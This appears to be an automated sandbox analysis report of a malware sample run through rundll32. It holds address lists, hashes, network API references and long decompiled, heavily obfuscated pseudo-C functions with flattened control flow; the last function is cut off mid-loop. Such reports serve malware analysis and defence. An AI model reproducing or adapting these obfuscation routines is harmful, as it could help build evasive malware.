                                                                                                                          0x007a74d4
                                                                                                                          0x007a74df
                                                                                                                          0x007a74f5
                                                                                                                          0x007a74fe
                                                                                                                          0x007a7509
                                                                                                                          0x007a7514
                                                                                                                          0x007a751f
                                                                                                                          0x007a752a
                                                                                                                          0x007a7532
                                                                                                                          0x007a7537
                                                                                                                          0x007a753c
                                                                                                                          0x007a7541
                                                                                                                          0x007a7549
                                                                                                                          0x007a7554
                                                                                                                          0x007a755c
                                                                                                                          0x007a7567
                                                                                                                          0x007a7572
                                                                                                                          0x007a757a
                                                                                                                          0x007a7585
                                                                                                                          0x007a7590
                                                                                                                          0x007a759d
                                                                                                                          0x007a759e
                                                                                                                          0x007a75a2
                                                                                                                          0x007a75a7
                                                                                                                          0x007a75af
                                                                                                                          0x007a75b7
                                                                                                                          0x007a75c1
                                                                                                                          0x007a75c5
                                                                                                                          0x007a75cd
                                                                                                                          0x007a75d5
                                                                                                                          0x007a75e8
                                                                                                                          0x007a75ef
                                                                                                                          0x007a75fa
                                                                                                                          0x007a7602
                                                                                                                          0x007a760a
                                                                                                                          0x007a7612
                                                                                                                          0x007a761a
                                                                                                                          0x007a7622
                                                                                                                          0x007a762a
                                                                                                                          0x007a762f
                                                                                                                          0x007a7637
                                                                                                                          0x007a763f
                                                                                                                          0x007a7647
                                                                                                                          0x007a7652
                                                                                                                          0x007a765a
                                                                                                                          0x007a7665
                                                                                                                          0x007a766d
                                                                                                                          0x007a7675
                                                                                                                          0x007a767d
                                                                                                                          0x007a7685
                                                                                                                          0x007a7690
                                                                                                                          0x007a769b
                                                                                                                          0x007a76a6
                                                                                                                          0x007a76b1
                                                                                                                          0x007a76c5
                                                                                                                          0x007a76cc
                                                                                                                          0x007a76d7
                                                                                                                          0x007a76df
                                                                                                                          0x007a76e7
                                                                                                                          0x007a76ec
                                                                                                                          0x007a76f4
                                                                                                                          0x007a76fc
                                                                                                                          0x007a7703
                                                                                                                          0x007a7703
                                                                                                                          0x007a7708
                                                                                                                          0x007a7708
                                                                                                                          0x007a7708
                                                                                                                          0x007a770d
                                                                                                                          0x00000000
                                                                                                                          0x007a770d
                                                                                                                          0x007a7717
                                                                                                                          0x007a799c
                                                                                                                          0x007a79aa
                                                                                                                          0x007a79ca
                                                                                                                          0x007a79cf
                                                                                                                          0x007a79d2
                                                                                                                          0x007a79d4

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 1?o$;X$>GU$CmN$G^FX$UoZ$^P>$bZ$ci1$X9$f$v(
                                                                                                                          • API String ID: 0-2206596976
                                                                                                                          • Opcode ID: ab9d6013328a83050dd89909d53a2598a7828cf8c1ec0ac91bb01357d901b5a7
                                                                                                                          • Instruction ID: 357176ce39462fdbeb8d2ac258af0c9d2ece5c7a9fbee6882754010181371b18
                                                                                                                          • Opcode Fuzzy Hash: ab9d6013328a83050dd89909d53a2598a7828cf8c1ec0ac91bb01357d901b5a7
                                                                                                                          • Instruction Fuzzy Hash: 6052FC71508381DBD378CF21C98AB9BBBE1BBC5308F108A1DE5DA96260D7B58949CF53
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 10012C6C
                                                                                                                          • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                          • _strcat.LIBCMT ref: 10012CE9
                                                                                                                          • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                          • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                            • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                            • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                            • Part of subcall function 1001DD46: GetDlgItem.USER32(?,0986EB69), ref: 1001DD53
                                                                                                                            • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                          • String ID: Connected$Disconnected$Wait...
                                                                                                                          • API String ID: 2263617321-2304371739
                                                                                                                          • Opcode ID: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                          • Instruction ID: 809deafcd8a1ebdff950075e8a5ab3cba01c3ccaf73ffb16f134ff4a091f78a6
                                                                                                                          • Opcode Fuzzy Hash: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                          • Instruction Fuzzy Hash: 88513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00792251(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                          				char _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				signed int _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				signed int _v120;
                                                                                                                          				signed int _v124;
                                                                                                                          				signed int _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				signed int _v136;
                                                                                                                          				signed int _v140;
                                                                                                                          				signed int _v144;
                                                                                                                          				signed int _v148;
                                                                                                                          				signed int _v152;
                                                                                                                          				signed int _v156;
                                                                                                                          				signed int _v160;
                                                                                                                          				signed int _v164;
                                                                                                                          				signed int _v168;
                                                                                                                          				signed int _v172;
                                                                                                                          				signed int _v176;
                                                                                                                          				signed int _v180;
                                                                                                                          				void* _t323;
                                                                                                                          				signed int _t369;
                                                                                                                          				signed int _t371;
                                                                                                                          				signed int _t372;
                                                                                                                          				signed int _t373;
                                                                                                                          				signed int _t374;
                                                                                                                          				signed int _t375;
                                                                                                                          				signed int _t376;
                                                                                                                          				signed int _t377;
                                                                                                                          				signed int _t378;
                                                                                                                          				signed int _t379;
                                                                                                                          				void* _t382;
                                                                                                                          				signed int* _t424;
                                                                                                                          				void* _t427;
                                                                                                                          				void* _t428;
                                                                                                                          				void* _t431;
                                                                                                                          
                                                                                                                          				_t425 = _a4;
                                                                                                                          				_push(_a12);
                                                                                                                          				_t424 = __edx;
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t323);
                                                                                                                          				_v104 = 0xfd7ba2;
                                                                                                                          				_t428 = _t427 + 0x14;
                                                                                                                          				_v104 = _v104 << 2;
                                                                                                                          				_v104 = _v104 ^ 0x03f5ee88;
                                                                                                                          				_t382 = 0x3e8dc94;
                                                                                                                          				_v112 = 0x53a35e;
                                                                                                                          				_t371 = 0x1c;
                                                                                                                          				_v112 = _v112 / _t371;
                                                                                                                          				_v112 = _v112 << 0xb;
                                                                                                                          				_v112 = _v112 ^ 0x17ec1018;
                                                                                                                          				_v100 = 0x45b9a1;
                                                                                                                          				_v100 = _v100 + 0xffff7cfc;
                                                                                                                          				_v100 = _v100 ^ 0x004aa95b;
                                                                                                                          				_v92 = 0xd93693;
                                                                                                                          				_v92 = _v92 + 0xb87a;
                                                                                                                          				_v92 = _v92 ^ 0x00df4f59;
                                                                                                                          				_v160 = 0x746cf1;
                                                                                                                          				_v160 = _v160 ^ 0x2b133776;
                                                                                                                          				_v160 = _v160 + 0xffff944c;
                                                                                                                          				_v160 = _v160 / _t371;
                                                                                                                          				_v160 = _v160 ^ 0x0189d9d1;
                                                                                                                          				_v144 = 0x9ec305;
                                                                                                                          				_v144 = _v144 + 0xffffd43e;
                                                                                                                          				_v144 = _v144 << 3;
                                                                                                                          				_v144 = _v144 ^ 0x04f670ec;
                                                                                                                          				_v148 = 0x64c482;
                                                                                                                          				_v148 = _v148 + 0x3823;
                                                                                                                          				_t372 = 0x6f;
                                                                                                                          				_v148 = _v148 / _t372;
                                                                                                                          				_v148 = _v148 ^ 0x000f1a49;
                                                                                                                          				_v68 = 0x131d36;
                                                                                                                          				_v68 = _v68 ^ 0xb06b804d;
                                                                                                                          				_v68 = _v68 ^ 0xb072f73d;
                                                                                                                          				_v124 = 0xcf68d3;
                                                                                                                          				_v124 = _v124 + 0x418a;
                                                                                                                          				_v124 = _v124 + 0xdb2c;
                                                                                                                          				_v124 = _v124 ^ 0x00d4c88c;
                                                                                                                          				_v140 = 0x60ea9a;
                                                                                                                          				_v140 = _v140 >> 0xa;
                                                                                                                          				_v140 = _v140 >> 4;
                                                                                                                          				_v140 = _v140 ^ 0x0002f747;
                                                                                                                          				_v116 = 0xa906b8;
                                                                                                                          				_t373 = 0x61;
                                                                                                                          				_v116 = _v116 * 0x66;
                                                                                                                          				_v116 = _v116 / _t373;
                                                                                                                          				_v116 = _v116 ^ 0x00b9e105;
                                                                                                                          				_v152 = 0x1b4b23;
                                                                                                                          				_v152 = _v152 + 0x6529;
                                                                                                                          				_v152 = _v152 << 7;
                                                                                                                          				_v152 = _v152 ^ 0x0dd37b6c;
                                                                                                                          				_v56 = 0xb64e13;
                                                                                                                          				_t374 = 0x36;
                                                                                                                          				_v56 = _v56 / _t374;
                                                                                                                          				_v56 = _v56 ^ 0x000ccadc;
                                                                                                                          				_v180 = 0xa61587;
                                                                                                                          				_v180 = _v180 ^ 0x79fc160a;
                                                                                                                          				_t375 = 0x7a;
                                                                                                                          				_v180 = _v180 * 0x16;
                                                                                                                          				_v180 = _v180 ^ 0x4f1bf23d;
                                                                                                                          				_v180 = _v180 ^ 0x22abe71e;
                                                                                                                          				_v120 = 0x473252;
                                                                                                                          				_v120 = _v120 + 0xffff4692;
                                                                                                                          				_v120 = _v120 / _t375;
                                                                                                                          				_v120 = _v120 ^ 0x000f54d2;
                                                                                                                          				_v60 = 0x2fd158;
                                                                                                                          				_v60 = _v60 + 0x5b64;
                                                                                                                          				_v60 = _v60 ^ 0x0034a0e9;
                                                                                                                          				_v84 = 0xc57bbf;
                                                                                                                          				_v84 = _v84 ^ 0x7beef004;
                                                                                                                          				_v84 = _v84 ^ 0x7b204221;
                                                                                                                          				_v52 = 0xc39e48;
                                                                                                                          				_t376 = 0x4d;
                                                                                                                          				_v52 = _v52 / _t376;
                                                                                                                          				_v52 = _v52 ^ 0x0006d078;
                                                                                                                          				_v108 = 0x102acf;
                                                                                                                          				_v108 = _v108 >> 0xa;
                                                                                                                          				_v108 = _v108 ^ 0x000242b6;
                                                                                                                          				_v80 = 0xaaee53;
                                                                                                                          				_t377 = 0x79;
                                                                                                                          				_v80 = _v80 * 0x74;
                                                                                                                          				_v80 = _v80 ^ 0x4d7dabdb;
                                                                                                                          				_v88 = 0x1ad2b9;
                                                                                                                          				_v88 = _v88 | 0x310da8db;
                                                                                                                          				_v88 = _v88 ^ 0x311cb062;
                                                                                                                          				_v136 = 0x81cc6c;
                                                                                                                          				_v136 = _v136 >> 0xc;
                                                                                                                          				_v136 = _v136 << 0xd;
                                                                                                                          				_v136 = _v136 ^ 0x0107e876;
                                                                                                                          				_v96 = 0x2bc0c4;
                                                                                                                          				_v96 = _v96 * 0x4c;
                                                                                                                          				_v96 = _v96 ^ 0x0cfd01fe;
                                                                                                                          				_v176 = 0x403c4e;
                                                                                                                          				_t174 =  &_v176; // 0x403c4e
                                                                                                                          				_v176 =  *_t174 / _t377;
                                                                                                                          				_t180 =  &_v176; // 0x403c4e
                                                                                                                          				_v176 =  *_t180 * 0x5e;
                                                                                                                          				_v176 = _v176 << 5;
                                                                                                                          				_v176 = _v176 ^ 0x0632c8a8;
                                                                                                                          				_v44 = 0x1618ce;
                                                                                                                          				_v44 = _v44 + 0xffff8813;
                                                                                                                          				_v44 = _v44 ^ 0x00124c47;
                                                                                                                          				_v76 = 0x551030;
                                                                                                                          				_v76 = _v76 + 0x65ef;
                                                                                                                          				_v76 = _v76 ^ 0x005f521e;
                                                                                                                          				_v132 = 0xb7ed4f;
                                                                                                                          				_v132 = _v132 << 0xb;
                                                                                                                          				_v132 = _v132 >> 0xa;
                                                                                                                          				_v132 = _v132 ^ 0x002e4b92;
                                                                                                                          				_v64 = 0xfb13c3;
                                                                                                                          				_v64 = _v64 * 0x16;
                                                                                                                          				_v64 = _v64 ^ 0x159ca6b2;
                                                                                                                          				_v168 = 0x8e8363;
                                                                                                                          				_v168 = _v168 ^ 0x49fc5726;
                                                                                                                          				_v168 = _v168 >> 8;
                                                                                                                          				_v168 = _v168 >> 4;
                                                                                                                          				_v168 = _v168 ^ 0x0002bf0f;
                                                                                                                          				_v72 = 0x8b4c84;
                                                                                                                          				_t378 = 0x68;
                                                                                                                          				_v72 = _v72 / _t378;
                                                                                                                          				_v72 = _v72 ^ 0x00015b8a;
                                                                                                                          				_v128 = 0x282e65;
                                                                                                                          				_v128 = _v128 >> 3;
                                                                                                                          				_v128 = _v128 << 9;
                                                                                                                          				_v128 = _v128 ^ 0x0a079d52;
                                                                                                                          				_v156 = 0xadd370;
                                                                                                                          				_t379 = 0x3e;
                                                                                                                          				_v156 = _v156 / _t379;
                                                                                                                          				_v156 = _v156 << 0xf;
                                                                                                                          				_v156 = _v156 + 0xffff35e7;
                                                                                                                          				_v156 = _v156 ^ 0x66d9d095;
                                                                                                                          				_v164 = 0xb0b7ce;
                                                                                                                          				_v164 = _v164 + 0xffffdc7a;
                                                                                                                          				_v164 = _v164 * 0x61;
                                                                                                                          				_v164 = _v164 + 0xffff24b0;
                                                                                                                          				_v164 = _v164 ^ 0x42ea90cd;
                                                                                                                          				_v172 = 0xee7b33;
                                                                                                                          				_v172 = _v172 | 0x904c1683;
                                                                                                                          				_v172 = _v172 * 0x2c;
                                                                                                                          				_v172 = _v172 >> 4;
                                                                                                                          				_v172 = _v172 ^ 0x0e8d9d52;
                                                                                                                          				_v48 = 0xdaf5e6;
                                                                                                                          				_v48 = _v48 ^ 0xf4ca4d64;
                                                                                                                          				_v48 = _v48 ^ 0xf41f1779;
                                                                                                                          				goto L1;
                                                                                                                          				do {
                                                                                                                          					while(1) {
                                                                                                                          						L1:
                                                                                                                          						_t431 = _t382 - 0x9c1484f;
                                                                                                                          						if(_t431 > 0) {
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						if(_t431 == 0) {
                                                                                                                          							E00793DBC( &_v40, _t424, _v160, _v144, _v148);
                                                                                                                          							_t428 = _t428 + 0xc;
                                                                                                                          							_t382 = 0x9229f3e;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t382 == 0x3e8dc94) {
                                                                                                                          								_t382 = 0xb0d10f2;
                                                                                                                          								 *_t424 =  *_t424 & 0x00000000;
                                                                                                                          								_t424[1] = _v104;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								if(_t382 == 0x73dcb22) {
                                                                                                                          									E007A0DAF(_v176,  &_v40, _v44,  *((intOrPtr*)(_t425 + 0x44)), _v76, _v132);
                                                                                                                          									_t428 = _t428 + 0x10;
                                                                                                                          									_t382 = 0xca0d778;
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									if(_t382 == 0x8cfc35c) {
                                                                                                                          										E007A0DAF(_v60,  &_v40, _v84,  *((intOrPtr*)(_t425 + 0x3c)), _v52, _v108);
                                                                                                                          										_t428 = _t428 + 0x10;
                                                                                                                          										_t382 = 0xfa9ed0f;
                                                                                                                          										continue;
                                                                                                                          									} else {
                                                                                                                          										if(_t382 == 0x9229f3e) {
                                                                                                                          											E007B0E3A( &_v40, _v68, __eflags, _v124, _v140, _v116, _t425 + 0x1c);
                                                                                                                          											_t428 = _t428 + 0x10;
                                                                                                                          											_t382 = 0xa7e786e;
                                                                                                                          											continue;
                                                                                                                          										} else {
                                                                                                                          											if(_t382 != 0x95701e8) {
                                                                                                                          												goto L24;
                                                                                                                          											} else {
                                                                                                                          												_push(_t382);
                                                                                                                          												_push(_t382);
                                                                                                                          												_t369 = E00797FF2(_t424[1]);
                                                                                                                          												 *_t424 = _t369;
                                                                                                                          												if(_t369 != 0) {
                                                                                                                          													_t382 = 0x9c1484f;
                                                                                                                          													continue;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L27:
                                                                                                                          						__eflags =  *_t424;
                                                                                                                          						_t322 =  *_t424 != 0;
                                                                                                                          						__eflags = _t322;
                                                                                                                          						return 0 | _t322;
                                                                                                                          					}
                                                                                                                          					__eflags = _t382 - 0xa7e786e;
                                                                                                                          					if(_t382 == 0xa7e786e) {
                                                                                                                          						E007A0DAF(_v152,  &_v40, _v56,  *((intOrPtr*)(_t425 + 0x48)), _v180, _v120);
                                                                                                                          						_t428 = _t428 + 0x10;
                                                                                                                          						_t382 = 0x8cfc35c;
                                                                                                                          						goto L24;
                                                                                                                          					} else {
                                                                                                                          						__eflags = _t382 - 0xa84b454;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							E007B0E3A( &_v40, _v156, __eflags, _v164, _v172, _v48, _t425 + 0x14);
                                                                                                                          						} else {
                                                                                                                          							__eflags = _t382 - 0xb0d10f2;
                                                                                                                          							if(_t382 == 0xb0d10f2) {
                                                                                                                          								_t424[1] = E007AC631(_t425);
                                                                                                                          								_t382 = 0x95701e8;
                                                                                                                          								goto L1;
                                                                                                                          							} else {
                                                                                                                          								__eflags = _t382 - 0xca0d778;
                                                                                                                          								if(_t382 == 0xca0d778) {
                                                                                                                          									E007A0DAF(_v64,  &_v40, _v168,  *_t425, _v72, _v128);
                                                                                                                          									_t428 = _t428 + 0x10;
                                                                                                                          									_t382 = 0xa84b454;
                                                                                                                          									goto L1;
                                                                                                                          								} else {
                                                                                                                          									__eflags = _t382 - 0xfa9ed0f;
                                                                                                                          									if(_t382 != 0xfa9ed0f) {
                                                                                                                          										goto L24;
                                                                                                                          									} else {
                                                                                                                          										E007A0DAF(_v80,  &_v40, _v88,  *((intOrPtr*)(_t425 + 0x30)), _v136, _v96);
                                                                                                                          										_t428 = _t428 + 0x10;
                                                                                                                          										_t382 = 0x73dcb22;
                                                                                                                          										goto L1;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					goto L27;
                                                                                                                          					L24:
                                                                                                                          					__eflags = _t382 - 0xd4a25d5;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				goto L27;
                                                                                                                          			}

                                                                                                                          0x0079290a
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: !B {$#8$)e$3{$N<@$R2G$d[$e.($nx~$nx~$e
                                                                                                                          • API String ID: 0-245365489
                                                                                                                          • Opcode ID: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                          • Instruction ID: 837e9b62f42f2b7f7a0c2e11ffe5565dd06933a40b7202369227280efaae39a3
                                                                                                                          • Opcode Fuzzy Hash: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                          • Instruction Fuzzy Hash: D5F141725083809FD768DF61C88AA5BFBF1FBD4348F10890DE29A86261D7B58959CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00799714(void* __ecx, void* __edx) {
                                                                                                                          				signed int _v4;
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				void* _t251;
                                                                                                                          				intOrPtr _t252;
                                                                                                                          				intOrPtr _t253;
                                                                                                                          				void* _t257;
                                                                                                                          				signed int _t259;
                                                                                                                          				signed int _t260;
                                                                                                                          				signed int _t261;
                                                                                                                          				signed int _t262;
                                                                                                                          				signed int _t263;
                                                                                                                          				signed int _t264;
                                                                                                                          				void* _t292;
                                                                                                                          				void* _t293;
                                                                                                                          				signed int* _t296;
                                                                                                                          				signed int* _t297;
                                                                                                                          
                                                                                                                          				_t296 =  &_v104;
                                                                                                                          				_v4 = _v4 & 0x00000000;
                                                                                                                          				_v12 = 0xc5b764;
                                                                                                                          				_v8 = 0xb6da07;
                                                                                                                          				_v100 = 0x6b81aa;
                                                                                                                          				_v100 = _v100 ^ 0x5133456b;
                                                                                                                          				_t8 =  &_v100; // 0x5133456b
                                                                                                                          				_v100 =  *_t8 * 0x6e;
                                                                                                                          				_t292 = __edx;
                                                                                                                          				_v100 = _v100 << 0xa;
                                                                                                                          				_v100 = _v100 ^ 0x922ec96f;
                                                                                                                          				_t257 = __ecx;
                                                                                                                          				_v20 = 0x2c208b;
                                                                                                                          				_t293 = 0x52ffaa2;
                                                                                                                          				_v20 = _v20 + 0xffff37e6;
                                                                                                                          				_v20 = _v20 ^ 0x00212911;
                                                                                                                          				_v60 = 0xb21c01;
                                                                                                                          				_v60 = _v60 ^ 0x31980a41;
                                                                                                                          				_v60 = _v60 + 0xffff033c;
                                                                                                                          				_v60 = _v60 ^ 0x31255444;
                                                                                                                          				_v64 = 0x612501;
                                                                                                                          				_v64 = _v64 << 2;
                                                                                                                          				_v64 = _v64 + 0xf44;
                                                                                                                          				_v64 = _v64 ^ 0x018d6347;
                                                                                                                          				_v52 = 0x111460;
                                                                                                                          				_v52 = _v52 + 0xffffc2ff;
                                                                                                                          				_v52 = _v52 | 0x8d441097;
                                                                                                                          				_v52 = _v52 ^ 0x8d5fe5cb;
                                                                                                                          				_v56 = 0xb6e38a;
                                                                                                                          				_t259 = 0x67;
                                                                                                                          				_v56 = _v56 / _t259;
                                                                                                                          				_t260 = 0x41;
                                                                                                                          				_v56 = _v56 * 0x32;
                                                                                                                          				_v56 = _v56 ^ 0x00536033;
                                                                                                                          				_v96 = 0xaa1e09;
                                                                                                                          				_v96 = _v96 / _t260;
                                                                                                                          				_t261 = 0x73;
                                                                                                                          				_v96 = _v96 * 0xd;
                                                                                                                          				_v96 = _v96 / _t261;
                                                                                                                          				_v96 = _v96 ^ 0x00047537;
                                                                                                                          				_v88 = 0xebbfc;
                                                                                                                          				_v88 = _v88 << 7;
                                                                                                                          				_v88 = _v88 | 0x3053ba58;
                                                                                                                          				_t262 = 0x7f;
                                                                                                                          				_v88 = _v88 / _t262;
                                                                                                                          				_v88 = _v88 ^ 0x006c206b;
                                                                                                                          				_v44 = 0xece271;
                                                                                                                          				_v44 = _v44 + 0xffff86ef;
                                                                                                                          				_v44 = _v44 + 0x6a70;
                                                                                                                          				_v44 = _v44 ^ 0x00eb9b45;
                                                                                                                          				_v48 = 0xd70038;
                                                                                                                          				_v48 = _v48 | 0x378b661e;
                                                                                                                          				_v48 = _v48 ^ 0xfc23f8e2;
                                                                                                                          				_v48 = _v48 ^ 0xcbf8b4c1;
                                                                                                                          				_v92 = 0x86f3ef;
                                                                                                                          				_v92 = _v92 << 0xd;
                                                                                                                          				_v92 = _v92 >> 0xd;
                                                                                                                          				_v92 = _v92 + 0x4513;
                                                                                                                          				_v92 = _v92 ^ 0x000ef1b6;
                                                                                                                          				_v80 = 0x7a204;
                                                                                                                          				_v80 = _v80 + 0xffffa60a;
                                                                                                                          				_v80 = _v80 | 0x4d150135;
                                                                                                                          				_v80 = _v80 + 0xffff9d32;
                                                                                                                          				_v80 = _v80 ^ 0x4d179d3b;
                                                                                                                          				_v40 = 0x124198;
                                                                                                                          				_v40 = _v40 ^ 0x5335feb3;
                                                                                                                          				_t263 = 0x78;
                                                                                                                          				_v40 = _v40 * 0x18;
                                                                                                                          				_v40 = _v40 ^ 0xcbb00a78;
                                                                                                                          				_v84 = 0xcaa24a;
                                                                                                                          				_v84 = _v84 * 0x42;
                                                                                                                          				_v84 = _v84 ^ 0x45be5790;
                                                                                                                          				_v84 = _v84 + 0xffff0d2f;
                                                                                                                          				_v84 = _v84 ^ 0x718e360f;
                                                                                                                          				_v24 = 0x4d7038;
                                                                                                                          				_v24 = _v24 | 0x28b75b7a;
                                                                                                                          				_v24 = _v24 ^ 0x28f4655f;
                                                                                                                          				_v28 = 0x844762;
                                                                                                                          				_v28 = _v28 ^ 0xe0e1df8a;
                                                                                                                          				_v28 = _v28 ^ 0xe064bc9e;
                                                                                                                          				_v32 = 0xfc2930;
                                                                                                                          				_v32 = _v32 / _t263;
                                                                                                                          				_v32 = _v32 ^ 0x00028374;
                                                                                                                          				_v104 = 0xce3f74;
                                                                                                                          				_v104 = _v104 + 0x3224;
                                                                                                                          				_v104 = _v104 + 0x85ca;
                                                                                                                          				_t264 = 0xe;
                                                                                                                          				_v104 = _v104 / _t264;
                                                                                                                          				_v104 = _v104 ^ 0x0007887d;
                                                                                                                          				_v68 = 0x11fdc1;
                                                                                                                          				_v68 = _v68 | 0x0fd109af;
                                                                                                                          				_t265 = 0x52;
                                                                                                                          				_v68 = _v68 / _t265;
                                                                                                                          				_v68 = _v68 ^ 0x00367c27;
                                                                                                                          				_v72 = 0xa9a7e;
                                                                                                                          				_v72 = _v72 * 0x16;
                                                                                                                          				_v72 = _v72 ^ 0xca0bce5f;
                                                                                                                          				_v72 = _v72 ^ 0xcae4b7d2;
                                                                                                                          				_v76 = 0xb2d6c0;
                                                                                                                          				_v76 = _v76 + 0xffff5dcd;
                                                                                                                          				_v76 = _v76 >> 0xe;
                                                                                                                          				_v76 = _v76 >> 4;
                                                                                                                          				_v76 = _v76 ^ 0x0002e66e;
                                                                                                                          				_v16 = 0x41627;
                                                                                                                          				_v16 = _v16 + 0xccf7;
                                                                                                                          				_v16 = _v16 ^ 0x00091dff;
                                                                                                                          				_v36 = 0xd94625;
                                                                                                                          				_v36 = _v36 + 0x741;
                                                                                                                          				_v36 = _v36 << 0x10;
                                                                                                                          				_v36 = _v36 ^ 0x4d68793e;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_t251 = 0xc3f018b;
                                                                                                                          					do {
                                                                                                                          						L2:
                                                                                                                          						while(_t293 != 0x52ffaa2) {
                                                                                                                          							if(_t293 == 0x865547f) {
                                                                                                                          								_t265 = _v80;
                                                                                                                          								_t252 = E0079CDAE(_v80, _v40, _v84,  *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                          								_t296 =  &(_t296[2]);
                                                                                                                          								 *((intOrPtr*)(_t292 + 0x1c)) = _t252;
                                                                                                                          								__eflags = _t252;
                                                                                                                          								_t251 = 0xc3f018b;
                                                                                                                          								_t293 =  !=  ? 0xc3f018b : 0xb7a2405;
                                                                                                                          								continue;
